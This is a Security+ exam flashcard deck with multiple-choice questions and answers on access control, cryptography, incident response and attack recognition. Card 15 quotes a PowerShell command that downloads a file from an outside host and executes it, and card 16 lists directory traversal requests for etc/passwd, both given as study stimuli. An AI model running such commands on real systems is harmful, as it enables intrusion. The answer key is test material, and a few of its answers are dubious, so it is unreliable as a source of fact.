Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Sec+ > 376-400 > Flashcards

376-400 Flashcards

1
Q

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

A. To provide data to quantify risk based on the organization’s systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization

A

A. To provide data to quantify risk based on the organization’s systems

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory
B. Rule-based
C. Discretionary
D. Role-based

A

A. Mandatory

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian
B. Data controller
C. Data protection officer
D. Data processor

A

B. Data controller

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer

A

B. SIEM

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Which of the following types of controls is a turnstile?

A. Physical
B. Detective
C. Corrective
D. Technical

A

A. Physical

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

A. nmap
B. tracert
C. ping
D. ssh

A

A. nmap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

  • The exception process and policy have been correctly followed by the majority of users.
  • A small number of users did not create tickets for the requests but were granted access.
  • All access had been approved by supervisors.
  • Valid requests for the access sporadically occurred across multiple departments.
  • Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

A

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral

A

C. Homomorphic

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

A. a rootkit.
B. a PUP.
C. a backdoor.
D. ransomware.
E. a RAT.

A

B. a PUP.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP

A

B. # iptables -F

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.

A

A. Document the collection and require a sign-off when possession changes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.

A

C. Third-party applications are not being patched.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage

A

A. Access control vestibule

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user’s list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition

A

A. Privilege escalation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.

A

A. A PowerShell code is performing a DLL injection.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:

GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2..2fetc2fpasswd
GET index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd

Which of the following BEST describes this kind of attack?

A. Directory traversal
B. SQL injection
C. API
D. Request forgery

A

A. Directory traversal

17
Q

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor

A

D. Data custodian

18
Q

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team

A

A. White team

19
Q

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN

A

D. VPN

19
Q

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.

A

D. Missing patches for third-party software on Windows workstations and servers.

20
Q

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs
B. The web server logs
C. The SIP traffic logs
D. The SNMP logs

A

A. The DNS logs

21
Q

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

A. .pfx
B. .csr
C. .pvk
D. .cer

A

D. .cer

22
Q

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography

A

B. Salting

23
Q

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

  • www.company.com (main website)
  • contactus.company.com (for locating a nearby location)
  • quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN
B. Wildcard
C. Extended validation
D. Self-signed

A

B. Wildcard

24
Q

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

A. SFTP
B. AIS
C. Tor
D. IoC

A

C. Tor

Sec+ (30 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions